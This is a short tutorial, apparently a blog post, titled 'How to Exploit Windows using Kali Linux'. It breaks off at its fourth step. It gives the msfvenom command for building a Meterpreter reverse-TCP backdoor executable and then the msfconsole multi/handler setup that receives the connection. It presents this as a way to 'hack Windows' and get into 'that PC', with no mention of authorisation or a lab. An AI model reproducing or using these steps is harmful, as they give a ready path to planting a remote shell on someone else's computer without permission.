How to Exploit Windows using Kali Linux
How to Exploit Windows using Kali Linux Step 1: Creating the Payload To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows. Open terminal and Type msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o /root/Desktop/win.exe Step 2: Starting the Metasploit Framework Console For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux. The Metasploit Framework Console has many payloads and many exploit method. To start the Metasploit Framework Console. In the terminal type msfconsole Step 3: Choosing the Exploit Method As I have said the Metasploit Framework Console has many exploitation method. In this we will use the multi handler. Type use exploit/multi/handler Step 4: Setting the Payload In above step we set our exploitation method. In this step we need to specify the payload that we have created. T...